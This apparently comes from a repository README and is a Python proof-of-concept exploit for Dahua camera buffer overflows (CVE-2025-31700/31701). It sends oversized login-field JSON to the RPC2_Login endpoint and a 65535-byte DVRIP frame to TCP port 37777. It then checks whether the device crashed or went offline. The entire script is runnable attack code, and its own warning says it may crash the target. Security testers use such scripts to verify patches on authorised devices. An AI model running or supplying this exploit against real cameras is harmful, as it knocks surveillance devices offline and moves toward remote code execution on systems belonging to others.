README.md
Rendering markdown...
#!/usr/bin/env python3
"""
dahua_rce.py - CVE-2025-31700 / CVE-2025-31701 Buffer Overflow PoC
====================================================================
CVE-2025-31700
CVSS : 8.1 HIGH
CWE : CWE-120 (Buffer Copy Without Checking Size of Input)
Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31700
Vendor: https://dahuasecurity.com/aboutUs/trustedCenter/details/775
CVE-2025-31701
CVSS : 8.1 HIGH
CWE : CWE-120
Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31701
Vendor: same advisory as CVE-2025-31700
Technical details
-----------------
Both CVEs are stack/heap buffer overflows triggered by specially crafted
inbound packets. On devices without ASLR/stack canaries, a crash or
controlled RCE is possible. With ASLR the most likely outcome is a DoS
(device restart or reboot).
This script:
1. Probes the HTTP RPC2 endpoint with an oversized JSON body.
2. Probes the Dahua binary protocol on TCP/37777 with an oversized frame.
3. Monitors for crash indicators (connection reset, timeout, 5xx), which
suggest - but do not by themselves prove - that the device is vulnerable.
WARNING - This test intentionally sends malformed data and *may crash the
target device*. Only run against devices you own or have written permission
to test.
"""
import argparse
import socket
import struct
import sys
import time
import requests
requests.packages.urllib3.disable_warnings()
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
TCP_PROTOCOL_PORT = 37777  # default TCP port used for the Dahua binary/DVRIP probe
HTTP_OVERFLOW_SZ = 8192  # characters in each oversized string field of the HTTP probe
TCP_OVERFLOW_SZ = 65535  # bytes in the body of the raw binary frame sent by the TCP probe
# ---------------------------------------------------------------------------
# HTTP / RPC2 overflow probe (CVE-2025-31700)
# ---------------------------------------------------------------------------
def http_overflow_probe(target, port=80, timeout=8):
    """
    POST a login-shaped JSON body with over-length string fields.

    The request goes to ``http://<target>:<port>/RPC2_Login``; the
    ``userName``, ``password`` and ``clientType`` fields each carry
    ``HTTP_OVERFLOW_SZ`` "A" characters.

    Returns a result dict:
    { "status": <int|str>, "bytes": <int>, "crashed": <bool> }

    ``crashed`` is True for an HTTP status >= 500, for a connection error
    whose message mentions "reset" or "refused", and for a timeout.  Every
    other failure is reported with ``crashed`` False.  No exception is
    allowed to escape from the request itself.
    """

    def outcome(status, crashed, size=0):
        # Single place that fixes the shape (and key order) of the result.
        return {"status": status, "bytes": size, "crashed": crashed}

    filler = "A" * HTTP_OVERFLOW_SZ
    login_params = {
        "userName": filler,
        "password": filler,
        "clientType": filler,
        "authorityType": "Default",
        "passwordType": "Default"
    }
    request_body = {"method": "global.login", "params": login_params, "id": 1}
    endpoint = f"http://{target}:{port}/RPC2_Login"

    try:
        response = requests.post(
            endpoint, json=request_body, timeout=timeout, verify=False
        )
        code = response.status_code
        return outcome(code, code >= 500, len(response.content))
    except requests.exceptions.ConnectionError as exc:
        # NOTE: requests' ConnectTimeout also derives from ConnectionError,
        # so a connect-phase timeout is classified here by its message text
        # rather than by the Timeout handler below.
        detail = str(exc).lower()
        if "reset" in detail or "refused" in detail:
            return outcome("CONNECTION_RESET", True)
        return outcome(f"CONN_ERROR: {exc}", False)
    except requests.exceptions.Timeout:
        return outcome("TIMEOUT", True)
    except Exception as exc:
        # Anything unexpected is reported, not raised, and not counted
        # as a crash indicator.
        return outcome(str(exc), False)
# ---------------------------------------------------------------------------
# TCP binary protocol overflow probe (CVE-2025-31701)
# ---------------------------------------------------------------------------
def build_dvrip_frame(body):
    """
    Prefix *body* with the 12-byte header this script uses for its
    DVRIP / Dahua binary protocol probe.

    Header layout (big-endian):
    uint16 0xFFD1     version magic
    uint16 0x0000     session (0 = unauthenticated)
    uint16 0x0000     sequence
    uint16 0x0000     channel
    uint32 len(body)  body length

    Returns the header immediately followed by *body*.
    """
    # One pack call for the whole header: four uint16 fields, then the
    # uint32 length.
    header = struct.pack(">HHHHI", 0xFFD1, 0x0000, 0x0000, 0x0000, len(body))
    return header + body
def tcp_overflow_probe(target, tcp_port=TCP_PROTOCOL_PORT, timeout=8):
    """
    Send one oversized frame to the binary-protocol port and report how the
    peer reacts.

    The frame is ``build_dvrip_frame`` applied to ``TCP_OVERFLOW_SZ`` "B"
    bytes.  *timeout* (seconds) applies to connect, send and receive.

    Returns { "status": <str>, "bytes": <int>, "crashed": <bool> }

    ``crashed`` is False when the connection could not be established
    (PORT_CLOSED, CONNECT_TIMEOUT, or any other connect error) and when the
    peer answers after the frame was sent.  It is True when the read times
    out after sending, on a broken pipe, or on any other error during
    send/receive.

    The socket is always closed before returning, including on the
    connect-failure paths.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except Exception as e:
        return {"status": str(e), "bytes": 0, "crashed": False}

    # ``with`` guarantees exactly one close() on every exit path below.
    with sock:
        try:
            sock.settimeout(timeout)
            sock.connect((target, tcp_port))
        except ConnectionRefusedError:
            return {"status": "PORT_CLOSED", "bytes": 0, "crashed": False}
        except socket.timeout:
            return {"status": "CONNECT_TIMEOUT", "bytes": 0, "crashed": False}
        except Exception as e:
            return {"status": str(e), "bytes": 0, "crashed": False}

        frame = build_dvrip_frame(b"B" * TCP_OVERFLOW_SZ)

        try:
            sock.sendall(frame)
            # Only the read gets the dedicated timeout status; a timeout
            # while sending falls through to the generic handler below.
            try:
                resp = sock.recv(1024)
            except socket.timeout:
                return {"status": "TIMEOUT_AFTER_SEND", "bytes": 0, "crashed": True}
            # NOTE: an empty read (peer closed the connection cleanly) is
            # also reported as RESPONDED with bytes == 0.
            return {"status": "RESPONDED", "bytes": len(resp), "crashed": False}
        except BrokenPipeError:
            return {"status": "BROKEN_PIPE (reset by peer)", "bytes": 0, "crashed": True}
        except Exception as e:
            return {"status": str(e), "bytes": 0, "crashed": True}
# ---------------------------------------------------------------------------
# Reachability check
# ---------------------------------------------------------------------------
def check_alive(target, port=80, timeout=5):
    """
    Report whether a plain HTTP GET of ``http://<target>:<port>/`` completes.

    Returns True when the request finishes without raising (whatever the
    HTTP status), False when any exception occurs.
    """
    root_url = f"http://{target}:{port}/"
    try:
        requests.get(root_url, timeout=timeout, verify=False)
    except Exception:
        # Any failure at all counts as "not reachable".
        return False
    else:
        return True
# ---------------------------------------------------------------------------
# Main exploit flow
# ---------------------------------------------------------------------------
def run(target, port=80, tcp_port=TCP_PROTOCOL_PORT, timeout=8, cve="both"):
    """
    Drive the whole probe sequence and print a human-readable report.

    Steps: print the banner, check reachability over HTTP (exiting with
    status 1 if the device does not answer), run the probe(s) selected by
    *cve*, wait three seconds, check reachability again, then print a
    verdict based on the post-probe reachability and the probes' "crashed"
    flags.

    *cve* selects the probes: "http" / "2025-31700" runs only the HTTP
    probe, "tcp" / "2025-31701" only the TCP probe, "both" runs both.
    Returns None.
    """

    def show(result):
        # Three-line summary shared by both probes.
        print(f" status : {result['status']}")
        print(f" bytes : {result['bytes']}")
        print(f" crashed : {result['crashed']}")

    def yes_no(flag):
        return 'YES' if flag else 'NO'

    print(f"""
=================================================
Dahua Buffer Overflow CVE-2025-31700/31701
WARNING: may crash the target device (DoS)
=================================================
Target : {target}
HTTP : :{port}
TCP/DVRIP: :{tcp_port}
Mode : {cve}
""")

    reachable_before = check_alive(target, port, timeout)
    print(f"[*] Device reachable before probe: {yes_no(reachable_before)}")
    if not reachable_before:
        print("[-] Device not responding aborting")
        sys.exit(1)

    # Placeholders reported for a probe that the selected mode skips.
    http_result = {"status": "SKIPPED", "bytes": 0, "crashed": False}
    tcp_result = {"status": "SKIPPED", "bytes": 0, "crashed": False}

    run_http = cve in ("http", "both", "2025-31700")
    run_tcp = cve in ("tcp", "both", "2025-31701")

    if run_http:
        print("\n[*] Sending HTTP RPC2 overflow (CVE-2025-31700) ...")
        http_result = http_overflow_probe(target, port, timeout)
        show(http_result)

    if run_tcp:
        print("\n[*] Sending TCP/DVRIP overflow (CVE-2025-31701) ...")
        tcp_result = tcp_overflow_probe(target, tcp_port, timeout)
        show(tcp_result)

    # Pause before re-checking reachability.
    time.sleep(3)
    reachable_after = check_alive(target, port, timeout)
    print(f"\n[*] Device reachable after probe : {yes_no(reachable_after)}")

    divider = "=" * 51
    print("\n" + divider)
    print("RESULT")
    print(divider)

    crash_seen = http_result["crashed"] or tcp_result["crashed"]

    if not reachable_after:
        print(" [!!!] Device OFFLINE after payload DoS confirmed")
        print(" Likely VULNERABLE to CVE-2025-31700 / CVE-2025-31701")
    elif crash_seen:
        print(" [!!!] Crash indicators observed during probe")
        print(" Likely VULNERABLE (verify by checking device logs/reboot)")
        # Reaching this branch already implies the device answered again.
        print("\n [+] Device recovered ASLR or watchdog may have restarted the service")
        print(" [+] Consistent with a real overflow contained by ASLR")
    else:
        print(" [-] No crash observed possibly patched or different firmware")
        print(" Note: absence of crash does not guarantee patch; test on all ports")
def main():
    """Parse the command line and hand the options to ``run``."""
    usage_examples = """
Examples:
python dahua_rce.py 192.168.1.100
python dahua_rce.py 192.168.1.100 -p 8080 --tcp-port 37777
python dahua_rce.py 192.168.1.100 --cve http
python dahua_rce.py 192.168.1.100 --cve tcp
"""
    cli = argparse.ArgumentParser(
        description="Dahua CVE-2025-31700/01 Buffer Overflow DoS PoC",
        # Raw formatter keeps the line breaks of the examples epilog.
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_examples,
    )

    cli.add_argument("target", help="Camera IP or hostname")
    cli.add_argument(
        "-p", "--port",
        type=int,
        default=80,
        help="HTTP port (default: 80)",
    )
    cli.add_argument(
        "--tcp-port",
        type=int,
        default=TCP_PROTOCOL_PORT,
        help=f"Dahua binary protocol port (default: {TCP_PROTOCOL_PORT})",
    )
    cli.add_argument(
        "--cve",
        choices=["both", "http", "tcp", "2025-31700", "2025-31701"],
        default="both",
        help="Which overflow to test (default: both)",
    )
    cli.add_argument("--timeout", type=int, default=8)

    opts = cli.parse_args()
    run(opts.target, opts.port, opts.tcp_port, opts.timeout, opts.cve)


# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()